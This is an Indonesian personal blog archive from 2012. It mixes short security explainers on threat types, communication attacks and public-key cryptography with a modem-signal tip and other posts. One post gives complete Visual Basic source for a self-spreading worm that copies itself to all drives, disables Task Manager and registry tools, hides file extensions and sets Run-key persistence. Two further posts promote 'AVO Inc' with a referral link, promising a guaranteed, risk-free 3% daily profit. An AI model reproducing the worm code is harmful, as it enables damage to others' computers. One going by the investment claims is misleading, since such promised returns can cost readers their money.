Wednesday, November 21, 2012

Aspek-Aspek Ancaman Keamanan Komputer

Aspek-Aspek Ancaman Keamanan Komputer ~ Dalam dunia Cyber yang sangat keras saat ini, ancaman akan keamanan komputer sudah sangat memilikin resiko yang tinggi. banyaknya orang yang sudah memilkin kemampuan untuk melakukan penerobosan dalam sistem keamanan pada komputer sehingga mereka bisa mengetahui celah yang bisa dilalui untuk mendapatkan informasi atau data yang diinginkan oleh pelaku kejahatan cyber.
Kali ini saya akan berbagi beberapa aspek-aspek ancaman keamanan pada komputer, sehingga kita bisa lebih berhati-hati dalam berkomunikasi sehingga informasi yang ingin dibagikan keorang tertentu saja tidak menjadi informasi public di dunia maya.
berikut adalah aspek-aspek keamanan Komputer yang saya rangkai dalam blog saya.
  1. Interruption
    Interruption merupakan ancaman terhadap availability. Informasi dan data yang ada dalam sistem komputer dirusak dan dihapus, sehingga jika dibutuhkan, data atau informasi sudah tidak ada lagi. contoh dalam hal ini yaitu Hardisk dirusak, Kabel Komunikasi dipotong, dll yang bersifat diluar teknis secara software, melainkan harus dilakukan secara manual.


         ____________________________       _____________________________
    | Sumber Tujuan | | Sumber Tujuan |
    | ____ ____ | | ____ ____ |
    | | | | | | | | | | | |
    | | 11 |------------>| 22 | | | | 11 |------->| | 22 | |
    | |____| |____| | | |____| |____| |
    | Normal Flow | | Interruption |
    |____________________________| |_____________________________|


  2. Interception
    merupakan Ancaman terhadap kerahasiaan. informasi yang ada disadap atau orang yang tidak berhak untuk mendapatkan akses ke komputer di mana informasi tersebut disimpan. Pada aspek ini, data berhasil diambil sebelum atau sesudah data ditransmisikan ke tujuan. teknik ini sangat sering dilakukan dan sangat transparan. bahkan mungkin saat ini kita sedang disadap namun kita tak pernah menyadari hal tersebut. 
          ____________________________      ________________________________
    | Sumber Tujuan | | Sumber Tujuan |
    | ____ ____ | | ____ ____ |
    | | | | | | | | | | | |
    | | 11 |------------>| 22 | | | | 11 |---------------->| 22 | |
    | |____| |____| | | |____| | |____| |
    | Normal Flow | | | |
    |____________________________| | V |
    | ____ |
    | | | |
    | | 33 | |
    | |____| |
    | |
    | Interception |
    |________________________________|
  3. Modifikasi
    Aspek modifikasi merupakan ancaman terhadap integritas. Orang yang tidak berhak berhasil menyadap lalu lintas informasi yang sedang dikirim dan diubah sesuai keinginan tersebut.Pada Aspek ini informasi atau data tidak langsung terkirim ke tujuan, namun terkirim ke pelaku dan pelaku mempunyai otoritas full apakah data ingin diubah, dihapus bahkan pelaku bisa saja tidak meneruskan informasi tersebut ke tujuan.
          ___________________________    _________________________________
    | Sumber Tujuan | | Sumber Tujuan |
    | ____ ____ | | ____ ____ |
    | | | | | | | | | | | |
    | | 11 |------------>| 22 | | | | 11 |____ ___\| 22 | |
    | |____| |____| | | |____| \ / /|____| |
    | Normal Flow | | \ ____ / |
    |___________________________| | | | |
    | | 33 | |
    | |____| |
    | |
    | Modification |
    |_________________________________|
  4. Fabrication
    Fabrication merupakan ancaman terhadap integrity. orang yang tidak berhak berhasil meniru dengan memalsukan suatu informasi yang ada sehingga orang menerima informasitersebut, menyangka informasi tersebut berasal dari orang yang dikehendakioleh si penerima informasi tersebut.
          ___________________________    _________________________________
    | Sumber Tujuan | | Sumber Tujuan |
    | ____ ____ | | ____ ____ |
    | | | | | | | | | | | |
    | | 11 |------------>| 22 | | | | 11 | ___\| 22 | |
    | |____| |____| | | |____| / /|____| |
    | Normal Flow | | ____ / |
    |___________________________| | | | |
    | | 33 | |
    | |____| |
    | |
    | Fabrication |
    |_________________________________|
     
    Demikian Artikel Mengenai Aspek-Aspek Ancaman keamanan Komputer, Semoga bisa menjadi Informasi yang bermanfaat untuk teman-teman. salam Blogging
        

Jenis Penyerangan Pada Jalur Komunikasi

Jenis Penyerangan Pada Jalur Komunikasi ~ dalam Berkomunikasi data di jaringan komputer memang memilki banyak resiko dikarenakan banyaknya orang yang memanfaatkan celah jaringan untuk menakuisisi sebuah jaringan agar bisa di ambil alih bahkan bisa memanipulasi data yang berhasil di ambil alih.

berikut adalah beberapa teknik penyerangan yang sering dilakukan oleh seorang perusak (not hacker) mengapa not hacker, karna hacker bisa saja baik, tidak selamanya hacker itu bersifat perusak, cuman banyak orang yang mengatas namakan hacker untuk kejahatannya.

Inilah beberapa jenis Penyerangan pada jaluk komunikasi :

  1. Sniffing
    Secara Harfiah Sniffing berarti Mengendus, tentunya dalam hal ini yang diendus adalah pesan yang dikomunikasikan baik yang belum ataupun sudah dienkripsi. Hal ini umum terjadi pada saluran publik yang tidak aman, sang pengendus dapat merekam Pembicaraan yang terjadi.
  2. Replay attack
    Jika seseorang bisa merekam pesan-pesan handshake (persiapan komunikasi), ia mungkin dapat mengulang pesan-pesan yang telah direkamnya untuk menipu salah satu pihak.
  3. Spoofing
    Penyerang – misalnya Maman – bisa menyamar menjadi Anto. Semua orang dibuat percaya bahwa Maman adalah Anto. Penyerang berusaha meyakinkan pihak-pihak lain bahwa tak ada salah dengan komunikasi yang dilakukan, padahal komunikasi itu dilakukan dengan sang penipu/penyerang. Contohnya jika orang memasukkan PIN ke dalam mesin ATM palsu – yang benar-benar dibuat seperti ATM asli – tentu sang penipu bisa mendapatkan PIN-nya dan copy pita magentik kartu ATM milik sang nasabah. Pihak bank tidak tahu bahwa telah terjadi kejahatan.
  4. Man-in-the-middle
    Jika spoofing terkadang hanya menipu satu pihak, maka dalam skenario ini, saat Anto hendak berkomunikasi dengan Badu, Maman di mata Anto seolah-olah adalah Badu, dan Maman dapat pula menipu Badu sehingga Maman seolah-olah adalah Anto. Maman dapat berkuasa penuh atas jalur komunikas ini, dan bisa membuat berita fitnah.
Demikan artikel mengenai jenis Penyerangan pada jalur komunikasi. semoga bermanfaat buat teman-teman. yang jelas tidak ada jaringan yang aman 100%, semuanya pasti memiliki celah untuk diakses.

Wednesday, November 14, 2012

Cara mempercepat Koneksi di Daerah Terpencil

Cara Mempercepat Koneksi di daerah terpencil ~ pada artikel kali ini saya akan sedikit membahas mengenai koneksi internet di daerah yang masih terpencil seperti di Labakkang kab. Pangkajene Sulawesi Selatan. koneksi internet di daerah saya sangat-sangat minim.

kecepatan koneksi sebenrnya tergantung dengan besar kecilnya signal di daerah tersebut. kebetulan saya menggunakan modem Flexi Huawei Mobile Broadband dengan Kecepatan 7.2 Mbps dengan bandwith 3.2 Mbps dari Flexi untuk koneksi Evdo. namun apa daya, koneksi evdo hanya mendukung di area Makassar dan sekitarnya. untuk daerah Pangkajene, masih belum memiliki jaringan Evdo jadi harus beralih ke jaringan 1X. (Semoga Pihak flexi melihat bahwa ada seorang blogger yag butuh jaringan EVDO di Pangkajene hehehehe)

cukup Menyulitkan untuk daerah seperti daerah saya ini. saya harus menggunakan trik khusus untuk mendapatkan koneksi 1X yang maksimal. dengan berbagai cara saya mempelajari tentang konsep signal dan alhasil saya menemukan bahwa, Signal akan Strange jika daerah tersebut terdapat BTS yang dekat dengan received dalam hal ini modem sebagai received. 

waduh apa saya harus pindah rumah dekat BTS supaya bisa dapat signal strengh? atau harus bangun BTS sendiri di dekat rumah dengan tinggi 30 Meter? sepertinya cara-cara ini sangat mustahil dilakukan. Baiklah tanpa basa-basi lagi saya menggunakan trick khusus untuk mengakali jauhnya BTS dari rumah saya dengan cara yang mudah tanpa ngeluarin biaya sedikitpun

Berikut Adalah Cara Untuk mempercepat Koneksi didaerah terpencil :


Gunakan Benda Berbahan alumunium untuk menambah jarak tangkap modem ke BTS. anda cukup keluar rumah dan cari BTS Flexi Terdekat dari rumah anda dan arahkan alumunium tersebut ke arah BTS. Alumunium yang dapat digunakan dan sering digunakan di keseharian yaitu Panci Penggorengan, Besi Payung, Penutup Case CPU, dandangan, dll.

dengan Menggunakan cara seperti ini, saya bisa mendapatkan signal hingga tiga Bar yang sebelumnya hanya satu bar. bahkan saya sudah bisa blogging dengan cepat ketika saya menggunakan cara tersebut. 

                                    

lihatlah apa yang saya lakukan, saya tidak perlu pindah rumah dekat BTS, atau saya juga tidak perlu membangun BTS setinggi 30 Meter untuk dapat koneksi yang melimpah, saya hanya perlu tower setinggi 15 cm dekat modem saya hingga modem bisa mendapatkan koneksi yang maksimal. ini untuk menambah jarak jangkauan tangkapan signal untuk modem.


Perhatikan Traffic Modem saya, saya bisa mendapatkan kecepatan hingga 125kbps untuk download dan upload. mungkin cara ini bisa membuat anda sedikit gila kiranya, tapi kenyataan dan fakta selalu benar dan alhamdulillah saya masih diberi kesempatan oleh yang kuasa untuk tetap berbagi kepada teman-teman.


Demikian Artikel mengenai Cara mempercepat Koneksi modem di Daerah terpencil. semoga teman-teman yang bermukim di daerah juga bisa eksis di dunia maya. ingat kawan saat ini jarak tidak akan menjadi sebuah penghalang, yang penting ingin berusaha, didalam rumah pun bisa mendapatkan penghasilan dari dunia maya.

Enkripsi Modern Kriptografi Asimetris

Enkripsi Modern Kriptografi Asimetris ~ pada kriptografi simetris hanya menggunakan 1 buah kunci pada saat enkripsi maupun dekripsi. Hal itu tentu saja menimbulkan masalah pada saat melakukan pertukaran kunci seperti pada kasus Alice yang ingin mengirim pesan rahasia kepada Bob. Bagaimana cara mereka menegosiasikan kunci yang akan digunakan? apakah melalui sms, email atau telepon? bukankah itu semua bisa disadap?

Apa itu Kriptografi Asimetris?

Kriptografi Asimentris atau disebut juga Public Key Criptography (PKC), adalah kriptografi yang menggunakan 2 buah kunci (private & publik) yang masing-masing kunci tersebut hanya digunakan untuk enkripsi saja atau dekripsi saja.

Kunci public adalah kunci yang publikasikan/diberikan kepada orang lain, sedangkan kunci private harus dirahasiakan.

Apabila pesan di-enkripsi menggunakan kunci publik, maka dekripsi-nya menggunakan kunci private. Artinya, pesan hanya bisa dibuka oleh pemilik kunci private. Hal ini biasanya digunakan untuk tujuan confidentalily (kerahasiaan).

Sebaliknya, apabila pesan dienkripsi menggunakan kunci private, maka dekripsi-nya menggunakan kunci publik. Disini sudah jelas, berarti semua orang bisa membukanya. Ini biasa digunakan untuk melakukan authentication.

Alice dan Bob

Jika sebelumnya Alice dan Bob kesulitan dalam melakukan pertukaran kunci karena mereka menggunakan kriptigrafi simetris, coba lihat apabila mereka menggunakan kriptografi asimetris.

Saat Alice ingin mengirim pesan rahasia kepada Bob, mereka masing-masing harus sudah mempunyai kunci publik & private. Bila Alice ingin mengirim pesan kepada Bob, maka Alice mengenkripsi pesanya dengan kunci publik milik Bob (ingat, kunci publik boleh dimiliki oleh siapa saja), kemudian Bob mendekripsi pesan dari Alice menggunakan kunci private miliknya.

Terkesan lebih aman bukan? tapi tunggu, masih ada hal buruk yang dapat terjadi pada kriptografi asimetris.


Kronologi


Sebelum Alice mengirim pesan rahasia kepada Bob, Alice meminta
kunci publik milik Bob. Kemudian Bob mengirim kunci publik-nya kepada Alice.

Sebelum kunci publik itu sampai di Alice, tanpa sepengetahuan Alice dan Bob, kunci publik milik Bob DICATAT oleh Charlie dan DIGANTI dengan kunci publik milik Charlie sendiri, lalu dikirimkan lagi (diteruskan) ke Alice.

Alice tertipu, mengira bahwa kunci publik yang diterimanya adalah kunci publik milik Bob, padahal itu milik Charlie.

Setelah selesai menuliskan pesan rahasianya, kemudian Alice meng-enkripsi pesannya menggunakan kunci pulic milik Charlie (bukan milik Bob) dan mengirimkannya ke Bob.

Sebelum sampai di Bob, pesan dari Alice di-dekripsi oleh Charlie menggunakan kunci private miliknya (karena pesan tersebut dienkripsi menggunakan kunci publik milik Charlie).

Agar Bob tidak curiga, pesan yang sudah di-dekripsi itu di-enkripsi kembali menggunakan kunci publik milik Bob yang sebelumnya sudah dicatat oleh Charlie, kemudian dikirimkan lagi ke Bob.

Bob men-dekripsi pesan itu dengan kunci private miliknya, dan pesan itu dibaca oleh Bob seperti tidak terjadi apa-apa.

Pada kasus diatas, MITM terjadi karena Alice tidak bisa memastikan apakah pesan berisi kunci publik yang diterimanya adalah benar milik Bob. Untuk bisa memastikan pesan itu berisi kunci publik milik Bob, maka pesan itu harus di-enkripsi menggunakan kunci private milik Bob dan di-dekripsi oleh Alice menggunakan kunci publik milik Bob, padahal Alice belum mengetahui kunci publik milik Bob.

Bagaimana solusinya? 

Agar serangan MITM tidak terjadi dibutuhkan mekanisme untuk mendapatkan kunci publik dengan benar.

Untuk memecahkan masalah diatas, dibutuhkan bantuan pihak ke-3 sebagai pihak penjamin yang
kunci publik-nya telah diketahui sebelumnya.

Mari kita ilustrasikan pengembangan dari kasus
MITM sebelumnya yang dilakukan oleh Charlie. Anggap saja pihak penjamin itu adalah Dedy, dengan kunci publik yang telah dikenal sebelumnya oleh Alice.

Ketika Alice ingin mengetahui
kunci publik Bob, maka Bob sebelumnya harus meminta Dedy untuk membuat surat jaminan yang berisi kunci publik Bob dan pernyataan bahwa Bob adalah orang baik dan rajin menabung. :D

Kemudian surat itu di
-enkripsi dengan kunci private milik Dedy untuk memastikan bahwa surat itu benar dibuat oleh Dedy.

Bila Alice bertanya pada Bob, “Hey Bob tolong kirim
kunci publik mu, aku ada pesan rahasia untukmu”. Maka Bob akan mengirimkan surat jaminan dari Dedy pada Alice.

Ketika surat jaminan yang dikirim Bob tiba di Alice. Alice bisa menguji identitas pembuat surat itu dengan cara men
-dekripsi dengan kunci publik milik Dedy yang sudah dikenalnya.

Bila berhasil di
-dekripsi, maka surat jaminan itu benar dibuat oleh Dedy. Di dalam surat jaminan itu tertera juga kunci publik milik Bob. Kini Alice siap mengirim pesan rahasia pada Bob.

Bagaimana dengan Charlie? Bila Charlie nekat mengganti surat jaminan Dedy dengan surat jaminan yang dibuatnya sendiri lalu mengirimnya ke Alice. Maka Alice dengan mudah mengetahui bahwa surat ini palsu, karena tidak bisa di
-dekripsi dengan kunci publik Dedy, artinya surat jaminan ini bukan dibuat oleh Dedy.


Kelebihan Kriptografi Asimetris:
  • Pertukaran kunci mudah
  • Lebih aman dibandingkan kriptografi simetris


Kelemahan Kriptografi Asimetris:
  • Proses lama
  • Rawan serangan MITM
Demikian Artikel tentang Enkripsi Modern Kriptografi Asimetris Semoga bisa memberikan Pengetahuan tambahan untuk teman-teman yang ingin belajar Keamanan Komputer.

Monday, November 5, 2012

Membuat Virus Infected dengan menggunakan Visual Basic

Membuat Virus Infected dengan menggunakan Visual Basic ~ Artikel kali ini saya akan memperlihatkan cara membuat Virus menggunakan Visual Basic, sebelumnya saya akan menjelaskan viru itu apa.

Virus merupakan Program yang dibuat oleh seorang Programer untuk merusak file-file dalam komputer ataupun merusak file system komputer, sehingga komputer tidak bekerja secara optimal. salah satu pemrograman yang digunakan untuk membuat virus adalah Visual Basic ini.

Sekaran buka Project dan siapkan formnya. kemudian copy listing berikut ini di form

Option Explicit
Private Const FILE_ATTRIBUTE_READONLY = &H1
Private Const FILE_ATTRIBUTE_HIDDEN = &H2
Private Const FILE_ATTRIBUTE_SYSTEM = &H4'[=]
Private Const FILE_ATTRIBUTE_DIRECTORY = &H10
Private Const FILE_ATTRIBUTE_ARCHIVE = &H20
Private Const FILE_ATTRIBUTE_NORMAL = &H80
Private Const FILE_ATTRIBUTE_TEMPORARY = &H100
Private Const FILE_ATTRIBUTE_COMPRESSED = &H800
Private Const MAX_PATH = 260
Private Type FILETIME
dwLowDateTime As Long
dwHighDateTime As Long
End Type
Private Type WIN32_FIND_DATA
dwFileAttributes As Long
ftCreationTime As FILETIME
ftLastAccessTime As FILETIME
ftWriteTime As FILETIME
nFileSizeHigh As Long
nFileSizeLow As Long
dwReserved0 As Long
dwReserved1 As Long
cFileName As String * MAX_PATH
cAlternate As String * 14
End Type
Private Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" (ByVal LDrive As String) As Long Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lBuffer As String,
ByVal xSize As Long) As Long
Private Declare Function FindFirstFile Lib "kernel32" Alias "FindFirstFileA" (ByVal lpFileName As String, lpFindFileData As
WIN32_FIND_DATA) As Long
Private Declare Function FindNextFile Lib "kernel32" Alias "FindNextFileA" (ByVal hFindFile As Long, lpFindFileData As
WIN32_FIND_DATA) As Long

Private Declare Function FindClose Lib "kernel32" (ByVal hFindFile As Long) As Long
Private Declare Function CopyFile Lib "kernel32" Alias "CopyFileA" (ByVal lpExistingFileName As String, ByVal
lpNewFileName As String, ByVal bFaillExists As Long) As Long
Private pbMessage As Boolean
Private Function DriveType(Drive As String) As String
Dim cari As Long, kenali As String
If Len(penyimpan) = 1 Then penyimpan = penyimpan & ":\"
If Len(penyimpan) = 2 And Right$( penyimpan, 1) = ":" Then penyimpan = penyimpan & "\"
cari = GetDriveType(Drive)
Select Case cari
Case 2
kenali = "Removable Drive"
Case 3
kenali = "Fixed Drive"
Case 4
kenali = "Remote Drive"
Case 5
kenali = "CD-ROM"
Case 6
kenali = "RAM Disk"
Case Else
kenali = "Drive Doesn't Exist"
End Select
DriveType = kenali
End Function
Private Sub KopiKeDrive()
Dim ctr As Integer
Dim Drive As String
Dim x As Byte
ReDim Drives(0) As String
For ctr = 65 To 90
Drive = Chr(ctr) & ":\"
If DriveType(Drive) <> "Drive Doesn't Exist" Then
On Error Resume Next
FileCopy App.Path & "\" & App.EXEName & ".exe", Drive & "KageBunshinNinjutsu.exe"
End If
Next
End Sub

Private Sub Kopykewindow()
Dim ff As String * 255
Dim n As Long
n = GetWindowsDirectory(ff, 255)
On Error Resume Next
FileCopy App.Path & "\" & App.EXEName & ".exe", Left(ff, n) & "Nara.exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\windows\" & "Nara.exe"
FileCopy App.Path & "\" & App.EXEName & ".exe", "c:\windows\system32" & "Nara.exe"
End Sub

Public Sub GetFiles(path As String, subFolder As Boolean, Optional Pattern As String = "*.*")
Screen.MousePointer = vbHourglass
Dim WFD As WIN32_FIND_DATA
Dim hFile As Long, fPath As String, fName As String
fPath = AddBackSlash(path)
Dim sPattern As String
sPattern = Pattern
fName = fPath & sPattern
hFile = FindFirstFile(fName, WFD)
If (hFile > 0) And ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) <> FILE_ATTRIBUTE_DIRECTORY) Then
CopyFile "C:\Windows\Nara.exe", fPath & StripNulls(WFD.cFileName) & ".exe", 1
End If
If hFile > 0 Then
While FindNextFile(hFile, WFD)
If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) Then
CopyFile "C:\Windows\Nara.exe", fPath & StripNulls(WFD.cFileName) & ".exe", 1
End If
Wend
End If
If subFolder Then
hFile = FindFirstFile(fPath & "*.*", WFD)
If (hFile > 0) And ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And
StripNulls(WFD.cFileName) <> "." And StripNulls(WFD.cFileName) <> ".." Then
GetFiles fPath & StripNulls(WFD.cFileName), True, sPattern
End If
While FindNextFile(hFile, WFD)
If ((WFD.dwFileAttributes And FILE_ATTRIBUTE_DIRECTORY) = FILE_ATTRIBUTE_DIRECTORY) And
StripNulls(WFD.cFileName) <> "." And StripNulls(WFD.cFileName) <> ".." Then
GetFiles fPath & StripNulls(WFD.cFileName), True, sPattern

End If
Wend
End If
FindClose hFile
Screen.MousePointer = vbDefault
End Sub
Private Function StripNulls(f As String) As String
StripNulls = Left$(f, InStr(1, f, Chr$(0)) - 1)
End Function
Private Function AddBackSlash(S As String) As String
If Len(S) Then
If Right$(S, 1) <> "\" Then
AddBackSlash = S & "\"
Else
AddBackSlash = S
End If
Else
AddBackSlash = "\"
End If
End Function
Private Sub Infeksi()
GetFiles "c:", True, ".doc"
GetFiles "d:", True, ".doc"
GetFiles "e:", True, ".doc"
End Sub
Public Sub CreateKey(Folder As String, Value As String)
Dim b As Object
On Error Resume Next
Set b = CreateObject("wscript.shell")
b.RegWrite Folder, Value
End Sub
Public Sub CreateIntegerKey(Folder As String, Value As Integer)
Dim b As Object
On Error Resume Next
Set b = CreateObject("wscript.shell")
b.RegWrite Folder, Value, "REG_DWORD"
End Sub
Private Sub Kasi_integer()
CreateIntegerKey
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\CheckedVal
ue", 1
CreateIntegerKey
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL\DevaultValu
e", 1
CreateIntegerKey
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\CheckedV
alue", 2
CreateIntegerKey
"HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN\DevaultVal
ue", 2
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0
CreateIntegerKey
"HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 0
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 1
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 1
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 1
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 1
CreateIntegerKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun", 1
End Sub
Private Sub Bertahan()
Dim petik As String
petik = """"
CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Virus", petik & "C:\WINDOWS\System32\Nara.exe" & petik
CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Virus", petik & "C:\WINDOWS\Nara.exe"& petik
CreateKey "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Virus", petik & "C:\WINDOWS\Nara.exe" & petik
CreateKey "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\Virus", petik &
"C:\WINDOWS\System32\Nara.exe" & petik
CreateKey "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun\Virus", petik &
"C:\WINDOWS\System32\ Nara.exe" & petik
End Sub
Private Sub form_click()
App.TaskVisible = False
Me.visible = false
KopiKeDrive
Kopykewindow
Infeksi
Kasi_integer
Bertahan
End Sub


Selesai dan compile . . . dan saran saya jangan uji coba di komputer sendiri
Demikian Artikel tentang Cara Memebuat Virus Infected dengan Menggunakan Visual Basic

Bukti Pembayaran AVO INC Pertama

Bukti Pembayaran AVO INC Pertama ~ Pada Artikel kali ini saya akan berbagi informasi mengenai AVO INC, bisnis Investasi yang cukup menjanjikan untuk member di Indonesia, saya akan memperlihatkan bukti pembayaran dari AVO Inc yang Pertama, memang gak terlau besar karena saya bergabung dengan AVO kurang lebih seminggu yang lalu dengan deposit yang masih kecil juga, tapi lumayanlah untuk BO yang kesekian yang saya ikutin baru kali ini dapat bayaran.

AVO Inc merupakan manajemen aset perusahaan skala besar di Amerika Serikat yang didirikan pada 1996, Lalu membentuk grup di tahun 2003. AVO INC diciptakan oleh sekelompok pedagang profesional, ahli yang berkualitas, analis terampil dan bankir berpengalaman dengan diversifikasi bidang keahlian seperti saham, obligasi, komoditas, mata uang, energi, bahan baku dan reksadana dengan memiliki lebih dari 15 tahun pengalaman praktis yang luas dari keterampilan gabungan, pengetahuan, bakat, kreativitas, kecerdasan dan kemampuan untuk memungkinkan partisipasi dalam pasar bisnis dalam lingkungan investasi yang aman dan tidak berisiko.AVO INC dengan terus mengoptimalkan strategi manajemen, bisnis kebijakan, metode investasi dan sumber daya manusia memenangkan pembangunan stabil dan istimewa dengan pertimbangan halus dan estimasi pada berbagai faktor termasuk kredit, likuiditas, pasar, operasional, risiko strategis dan kepatuhan.

Berikut adalah Bukti WD saya yang pertama di AVO Inc
  
 Lumayan bisa menyedot pengunjung BO ini, yang pastinya Avo Top recomended untuk para pebisnis Online. dan semoga bisa berlajut terus menerus.

Demikianlah artikel tentang Bukti Pembayaran AVO Inc Pertama, semoga bisa menjadi bahan renungan buat teman-teman yang ingin ikut BO ini.

Tuesday, October 30, 2012

AVO Inc. Bisnis Investasi yang Menjanjikan

Avo Inc. Bisnis Investasi yang Menjanjikan ~ Dalam Ulasan Kali ini, saya akan membahas mengenai salah satu bisnis online yang cukup menjanjikan untuk diikuti, bisnis yang cukup menjanjikan untuk membe-membernya. itulah Avo Inc. AVO INC adalah manajemen aset perusahaan skala besar di Amerika Serikat yang didirikan pada 1996, Lalu membentuk grup di tahun 2003. AVO INC diciptakan oleh sekelompok pedagang profesional, ahli yang berkualitas, analis terampil dan bankir berpengalaman dengan diversifikasi bidang keahlian seperti saham, obligasi, komoditas, mata uang, energi, bahan baku dan reksadana dengan memiliki lebih dari 15 tahun pengalaman praktis yang luas dari keterampilan gabungan, pengetahuan, bakat, kreativitas, kecerdasan dan kemampuan untuk memungkinkan partisipasi dalam pasar bisnis dalam lingkungan investasi yang aman dan tidak berisiko.AVO INC dengan terus mengoptimalkan strategi manajemen, bisnis kebijakan, metode investasi dan sumber daya manusia memenangkan pembangunan stabil dan istimewa dengan pertimbangan halus dan estimasi pada berbagai faktor termasuk kredit, likuiditas, pasar, operasional, risiko strategis dan kepatuhan.

Perusahaan Investasi Skala Besar ini cukup saya percaya, dalam melayani membernya, AVO Inc cukup memberikan Pelayanan yang memuaskan. Hari ini saya Mencoba Withdraw Funds ke akun Liberty Reserve saya dan kurang dari 15 Menit,Withdraw saya telah di Proses Oleh pihak AVO Inc. 


Bisnis yang Menjanjikan ini Cukup Booming saat ini, dan tidak diragukan lagi karna telah dibuktikan oleh keberhasilan member Indonesia dengan Program yang sudah berjalan sealam 16 Tahun ini.

Kelebihan Dari AVO Inc ini adalah sebagai berikut:
1. Daftar Gratis sudah bisa dapat komisi referral.
2. Investasi dengan masa kontrak selama 90 hari kerja (Senin-Jum'at)
3. Investasi minimal $10
4. Profit pasti 3%/hari
5. WD minimal $0.01, tanpa FEE
6. Modal Investasi dikembalikan 100% setelah 90 hari
7. Garansi uang kembali 100% tanpa potongan
8. Komisi referral Level 1: 5%, Level 2: 2%, Level 3: 1% dari deposit referral
9. Perusahaan legal terdaftar dan memiliki ijin usaha dari pemerintah USA
10. Traffic Rank Alexa yang terus meningkat, menandakan AVO Inc semakin dipercaya oleh para investor dan calon investor karena legalitas perusahaan yang jelas.

CONTOH KALKULASI KEUNTUNGAN
Misal Investasi $100 dengan keuntungan 3% /Hari
maka = 3% x $100 x 90 = $270

Modal dikembalikan 100% jadi Profit + Return modal =
$270 + $100 = $ 370 dalam 90 hari

KEUNTUNGAN AFILIASI
1. Bonus 5% dari downline Level 1
2. Bonus 2% dari downline Level 2
3. Bonus 1% dari downline Level 3
Bagi yang berminat silahkan DAFTAR GRATIS disini:
https://avousa.com/?ref=AVO4571983
Untuk Berinteraksi langsung dengan saya Untuk Panduan silahkan Email ke  Agung.one94@gmail.com
Demikian Artikel Mengenai Avo Inc Bisnis Yang Menjanjikan semoga bisa menjadi tambahan buat teman-teman sekalian untuk ikut bergabung di AVO Inc.

Terima Kasih.

 
Design by Free WordPress Themes | Bloggerized by Lasantha - Premium Blogger Themes |